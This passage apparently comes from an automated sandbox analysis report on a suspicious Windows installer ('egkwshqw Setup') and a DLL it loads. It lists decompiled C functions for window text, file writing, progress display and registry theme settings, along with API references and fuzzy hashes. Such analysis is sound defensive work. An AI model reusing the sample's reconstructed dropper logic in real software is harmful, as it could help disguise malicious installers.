                                                    • Part of subcall function 100015C0: RegCreateKeyExW.ADVAPI32 ref: 10001625
                                                    • Part of subcall function 100015C0: SystemParametersInfoW.USER32 ref: 10001678
                                                    • Part of subcall function 100015C0: RegSetValueExW.ADVAPI32 ref: 100016C1
                                                    • Part of subcall function 100015C0: _memset.LIBCMT ref: 10001701
                                                    • Part of subcall function 100015C0: SystemParametersInfoW.USER32 ref: 10001731
                                                    • Part of subcall function 100015C0: RegSetValueExW.ADVAPI32 ref: 1000177A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Value$InfoParametersSystem$CloseCreateOpen_memset
                                                  • String ID: (%d)$1$Software\Microsoft\Windows\CurrentVersion\ThemeManager$ThemeActive
                                                  • API String ID: 1181574500-3417774832
                                                  • Opcode ID: 2866952081d3a7ae57e2f8b6fa27478bd80cc6aefd809aed57ed88c9d7beae50
                                                  • Instruction ID: 88e302a3cc619786090ceb89693497163ae79a82c71de8db697098f3c4f0f0a6
                                                  • Opcode Fuzzy Hash: 2866952081d3a7ae57e2f8b6fa27478bd80cc6aefd809aed57ed88c9d7beae50
                                                  • Instruction Fuzzy Hash: F721D774804314DFE704EFA4C58969EBBF0FF44380F10892DE88997255E7749A84DB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CloseInfoParametersSystemValue_memset
                                                  • String ID: IconTitleFont$\$\
                                                  • API String ID: 549746852-773436331
                                                  • Opcode ID: d5b6c1db21d7c5afde35c0070c5c16e83dada74116f9dea27fd5958d855ab9f2
                                                  • Instruction ID: 55b194ef40cdad6822c00e03f5f6d2094a0314672dd6cbfcc0724edb950dd0ac
                                                  • Opcode Fuzzy Hash: d5b6c1db21d7c5afde35c0070c5c16e83dada74116f9dea27fd5958d855ab9f2
                                                  • Instruction Fuzzy Hash: 8601C9B18043159FE714EF68D94939EBBF0FB84304F00899EE49DA7350D77596848F82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				long _t35;
                                                  				long _t37;
                                                  				void* _t40;
                                                  				long* _t49;
                                                  
                                                  				if(_a4 + 0xfffffecd > 5) {
                                                  					L15:
                                                  					return 0;
                                                  				}
                                                  				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                  				if(_t49 == 0) {
                                                  					goto L15;
                                                  				}
                                                  				_t35 =  *_t49;
                                                  				if((_t49[5] & 0x00000002) != 0) {
                                                  					_t35 = GetSysColor(_t35);
                                                  				}
                                                  				if((_t49[5] & 0x00000001) != 0) {
                                                  					SetTextColor(_a8, _t35);
                                                  				}
                                                  				SetBkMode(_a8, _t49[4]);
                                                  				_t37 = _t49[1];
                                                  				_v16.lbColor = _t37;
                                                  				if((_t49[5] & 0x00000008) != 0) {
                                                  					_t37 = GetSysColor(_t37);
                                                  					_v16.lbColor = _t37;
                                                  				}
                                                  				if((_t49[5] & 0x00000004) != 0) {
                                                  					SetBkColor(_a8, _t37);
                                                  				}
                                                  				if((_t49[5] & 0x00000010) != 0) {
                                                  					_v16.lbStyle = _t49[2];
                                                  					_t40 = _t49[3];
                                                  					if(_t40 != 0) {
                                                  						DeleteObject(_t40);
                                                  					}
                                                  					_t49[3] = CreateBrushIndirect( &_v16);
                                                  				}
                                                  				return _t49[3];
                                                  			}









                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                  • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                  • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLastPropWindow
                                                  • String ID: = %p$(%p,%s, %x)$unhandled flags: %x
                                                  • API String ID: 3600928031-1922187145
                                                  • Opcode ID: 21ecd27a23b81efd7d55e99d13fdbc8bcf03fb39b44bc6f2b5452cc55c293649
                                                  • Instruction ID: 131dd3a28fd9b00acbc1088055883de84b59c56b4bf0623045d3418d222c81e5
                                                  • Opcode Fuzzy Hash: 21ecd27a23b81efd7d55e99d13fdbc8bcf03fb39b44bc6f2b5452cc55c293649
                                                  • Instruction Fuzzy Hash: 7051A0B49042299FDB14DF28C4847A9BBF0EF48350F0088AEE99997351D7749A84CF96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E004026AF(struct _OVERLAPPED* __ebx) {
                                                  				void* _t27;
                                                  				long _t32;
                                                  				struct _OVERLAPPED* _t47;
                                                  				void* _t51;
                                                  				void* _t53;
                                                  				void* _t56;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  
                                                  				_t47 = __ebx;
                                                  				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
                                                  				_t52 = E00402A29(0xfffffff0);
                                                  				 *(_t58 - 0x38) = _t24;
                                                  				if(E00405727(_t52) == 0) {
                                                  					E00402A29(0xffffffed);
                                                  				}
                                                  				E0040587F(_t52);
                                                  				_t27 = E0040589E(_t52, 0x40000000, 2);
                                                  				 *(_t58 + 8) = _t27;
                                                  				if(_t27 != 0xffffffff) {
                                                  					_t32 =  *0x42ec34; // 0x27c00
                                                  					 *(_t58 - 0x30) = _t32;
                                                  					_t51 = GlobalAlloc(0x40, _t32);
                                                  					if(_t51 != _t47) {
                                                  						E004030E2(_t47);
                                                  						E004030B0(_t51,  *(_t58 - 0x30));
                                                  						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
                                                  						 *(_t58 - 0x34) = _t56;
                                                  						if(_t56 != _t47) {
                                                  							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
                                                  							while( *_t56 != _t47) {
                                                  								_t49 =  *_t56;
                                                  								_t57 = _t56 + 8;
                                                  								 *(_t58 - 0x48) =  *_t56;
                                                  								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                  								_t56 = _t57 +  *(_t58 - 0x48);
                                                  							}
                                                  							GlobalFree( *(_t58 - 0x34));
                                                  						}
                                                  						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
                                                  						GlobalFree(_t51);
                                                  						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                  					}
                                                  					CloseHandle( *(_t58 + 8));
                                                  				}
                                                  				_t53 = 0xfffffff3;
                                                  				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
                                                  					_t53 = 0xffffffef;
                                                  					DeleteFileA( *(_t58 - 0x38));
                                                  					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                  				}
                                                  				_push(_t53);
                                                  				E00401423();
                                                  				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
                                                  				return 0;
                                                  			}












                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00027C00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                  • GlobalFree.KERNEL32 ref: 00402758
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                  • GlobalFree.KERNEL32 ref: 00402771
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                  • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                  • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                  • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404EB3(CHAR* _a4, CHAR* _a8) {
                                                  				struct HWND__* _v8;
                                                  				signed int _v12;
                                                  				CHAR* _v32;
                                                  				long _v44;
                                                  				int _v48;
                                                  				void* _v52;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				CHAR* _t26;
                                                  				signed int _t27;
                                                  				CHAR* _t28;
                                                  				long _t29;
                                                  				signed int _t39;
                                                  
                                                  				_t26 =  *0x42e404; // 0x0
                                                  				_v8 = _t26;
                                                  				if(_t26 != 0) {
                                                  					_t27 =  *0x42ecd4; // 0x0
                                                  					_v12 = _t27;
                                                  					_t39 = _t27 & 0x00000001;
                                                  					if(_t39 == 0) {
                                                  						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
                                                  					}
                                                  					_t26 = lstrlenA(0x429878);
                                                  					_a4 = _t26;
                                                  					if(_a8 == 0) {
                                                  						L6:
                                                  						if((_v12 & 0x00000004) == 0) {
                                                  							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
                                                  						}
                                                  						if((_v12 & 0x00000002) == 0) {
                                                  							_v32 = 0x429878;
                                                  							_v52 = 1;
                                                  							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                  							_v44 = 0;
                                                  							_v48 = _t29 - _t39;
                                                  							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                  							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                  						}
                                                  						if(_t39 != 0) {
                                                  							_t28 = _a4;
                                                  							 *((char*)(_t28 + 0x429878)) = 0;
                                                  							return _t28;
                                                  						}
                                                  					} else {
                                                  						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                  						if(_t26 < 0x800) {
                                                  							_t26 = lstrcatA(0x429878, _a8);
                                                  							goto L6;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t26;
                                                  			}


















                                                  APIs
                                                  • lstrlenA.KERNEL32(00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                  • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                  • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041F64C,747DEA30), ref: 00404F0F
                                                  • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                  • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                                  • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                  • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004038E3(void* __ecx, void* __eflags) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed short _t6;
                                                  				intOrPtr _t11;
                                                  				signed int _t13;
                                                  				intOrPtr _t15;
                                                  				signed int _t16;
                                                  				signed short* _t18;
                                                  				signed int _t20;
                                                  				signed short* _t23;
                                                  				intOrPtr _t25;
                                                  				signed int _t26;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t24 = "1033";
                                                  				_t13 = 0xffff;
                                                  				_t6 = E00405B3E(__ecx, "1033");
                                                  				while(1) {
                                                  					_t26 =  *0x42ec64; // 0x1
                                                  					if(_t26 == 0) {
                                                  						goto L7;
                                                  					}
                                                  					_t15 =  *0x42ec30; // 0x79ee58
                                                  					_t16 =  *(_t15 + 0x64);
                                                  					_t20 =  ~_t16;
                                                  					_t18 = _t16 * _t26 +  *0x42ec60;
                                                  					while(1) {
                                                  						_t18 = _t18 + _t20;
                                                  						_t26 = _t26 - 1;
                                                  						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                  							break;
                                                  						}
                                                  						if(_t26 != 0) {
                                                  							continue;
                                                  						}
                                                  						goto L7;
                                                  					}
                                                  					 *0x42e400 = _t18[1];
                                                  					 *0x42ecc8 = _t18[3];
                                                  					_t23 =  &(_t18[5]);
                                                  					if(_t23 != 0) {
                                                  						 *0x42e3fc = _t23;
                                                  						E00405B25(_t24,  *_t18 & 0x0000ffff);
                                                  						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "egkwshqw Setup", 0xfffffffe));
                                                  						_t11 =  *0x42ec4c; // 0x1
                                                  						_t27 =  *0x42ec48; // 0x79f004
                                                  						if(_t11 == 0) {
                                                  							L15:
                                                  							return _t11;
                                                  						}
                                                  						_t25 = _t11;
                                                  						do {
                                                  							_t11 =  *_t27;
                                                  							if(_t11 != 0) {
                                                  								_t5 = _t27 + 0x18; // 0x79f01c
                                                  								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
                                                  							}
                                                  							_t27 = _t27 + 0x418;
                                                  							_t25 = _t25 - 1;
                                                  						} while (_t25 != 0);
                                                  						goto L15;
                                                  					}
                                                  					L7:
                                                  					if(_t13 != 0xffff) {
                                                  						_t13 = 0;
                                                  					} else {
                                                  						_t13 = 0x3ff;
                                                  					}
                                                  				}
                                                  			}


















                                                  APIs
                                                  • SetWindowTextA.USER32(00000000,egkwshqw Setup), ref: 0040397B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $1033$Xy$egkwshqw Setup$z=z
                                                  • API String ID: 530164218-1755756683
                                                  • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                  • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                                  • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                  • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404782(struct HWND__* _a4, intOrPtr _a8) {
                                                  				long _v8;
                                                  				signed char _v12;
                                                  				unsigned int _v16;
                                                  				void* _v20;
                                                  				intOrPtr _v24;
                                                  				long _v56;
                                                  				void* _v60;
                                                  				long _t15;
                                                  				unsigned int _t19;
                                                  				signed int _t25;
                                                  				struct HWND__* _t28;
                                                  
                                                  				_t28 = _a4;
                                                  				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                  				if(_a8 == 0) {
                                                  					L4:
                                                  					_v56 = _t15;
                                                  					_v60 = 4;
                                                  					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                  					return _v24;
                                                  				}
                                                  				_t19 = GetMessagePos();
                                                  				_v16 = _t19 >> 0x10;
                                                  				_v20 = _t19;
                                                  				ScreenToClient(_t28,  &_v20);
                                                  				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                  				if((_v12 & 0x00000066) != 0) {
                                                  					_t15 = _v8;
                                                  					goto L4;
                                                  				}
                                                  				return _t25 | 0xffffffff;
                                                  			}















                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                  • GetMessagePos.USER32 ref: 004047A5
                                                  • ScreenToClient.USER32 ref: 004047BF
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                  • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                                  • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                  • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E10004BA2(void* __ebx, void* __edi, void* __eflags) {
                                                  				void* __esi;
                                                  				void* _t3;
                                                  				intOrPtr _t6;
                                                  				long _t14;
                                                  				long* _t27;
                                                  
                                                  				E10004E3E(_t3);
                                                  				if(E10005F66() != 0) {
                                                  					_t6 = E1000581F(E10004984);
                                                  					 *0x100162f4 = _t6;
                                                  					__eflags = _t6 - 0xffffffff;
                                                  					if(_t6 == 0xffffffff) {
                                                  						goto L1;
                                                  					} else {
                                                  						_t27 = E10005BAB(1, 0x3bc);
                                                  						__eflags = _t27;
                                                  						if(_t27 == 0) {
                                                  							L6:
                                                  							E10004C18();
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						} else {
                                                  							__eflags = E1000587B( *0x100162f4, _t27);
                                                  							if(__eflags == 0) {
                                                  								goto L6;
                                                  							} else {
                                                  								_push(0);
                                                  								_push(_t27);
                                                  								E10004AEF(__ebx, __edi, _t27, __eflags);
                                                  								_t14 = GetCurrentThreadId();
                                                  								_t27[1] = _t27[1] | 0xffffffff;
                                                  								 *_t27 = _t14;
                                                  								__eflags = 1;
                                                  								return 1;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					E10004C18();
                                                  					return 0;
                                                  				}
                                                  			}









                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 10004BA2
                                                    • Part of subcall function 10004E3E: RtlEncodePointer.NTDLL(00000000,00000001,10004BA7,100044E5,10014570,00000008,100046AD,?,00000001,?,10014590,0000000C,1000477D,?,00000001,?), ref: 10004E41
                                                    • Part of subcall function 10004E3E: __initp_misc_winsig.LIBCMT ref: 10004E5C
                                                    • Part of subcall function 10004E3E: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 100058E0
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100058F4
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10005907
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1000591A
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1000592D
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 10005940
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 10005953
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 10005966
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 10005979
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 1000598C
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 1000599F
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 100059B2
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 100059C5
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 100059D8
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 100059EB
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 100059FE
                                                  • __mtinitlocks.LIBCMT ref: 10004BA7
                                                  • __mtterm.LIBCMT ref: 10004BB0
                                                    • Part of subcall function 10004C18: DeleteCriticalSection.KERNEL32(?,?,?,?,100045B0,10004596,10014570,00000008,100046AD,?,00000001,?,10014590,0000000C,1000477D,?), ref: 10005FB6
                                                    • Part of subcall function 10004C18: _free.LIBCMT ref: 10005FBD
                                                    • Part of subcall function 10004C18: DeleteCriticalSection.KERNEL32(10016348,?,?,100045B0,10004596,10014570,00000008,100046AD,?,00000001,?,10014590,0000000C,1000477D,?,00000001), ref: 10005FDF
                                                  • __calloc_crt.LIBCMT ref: 10004BD5
                                                  • __initptd.LIBCMT ref: 10004BF7
                                                  • GetCurrentThreadId.KERNEL32 ref: 10004BFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 3567560977-0
                                                  • Opcode ID: d258b63a973da6f3ee54a73adf4b3cf0eb1dd3c380360a6ead9d889c126fb8f1
                                                  • Instruction ID: 40c5fb67e6ea8fb405208f6c91ee4779caaa5e26b67fbf12647dff02284fca1a
                                                  • Opcode Fuzzy Hash: d258b63a973da6f3ee54a73adf4b3cf0eb1dd3c380360a6ead9d889c126fb8f1
                                                  • Instruction Fuzzy Hash: EFF0F0B610A6326DF264F7746C03A4B36C4DF022F1B234229F860D60EEFF61E8424298
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
                                                  				char _v68;
                                                  				int _t11;
                                                  				int _t20;
                                                  
                                                  				if(_a8 == 0x110) {
                                                  					SetTimer(_a4, 1, 0xfa, 0);
                                                  					_a8 = 0x113;
                                                  				}
                                                  				if(_a8 == 0x113) {
                                                  					_t20 =  *0x414c40; // 0x67196
                                                  					_t11 =  *0x428c50; // 0x6719a
                                                  					if(_t20 >= _t11) {
                                                  						_t20 = _t11;
                                                  					}
                                                  					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                  					SetWindowTextA(_a4,  &_v68);
                                                  					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                  				}
                                                  				return 0;
                                                  			}







                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                  • MulDiv.KERNEL32(00067196,00000064,0006719A), ref: 00402BB4
                                                  • wsprintfA.USER32 ref: 00402BC4
                                                  • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                  • SetDlgItemTextA.USER32 ref: 00402BE6
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402BBE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
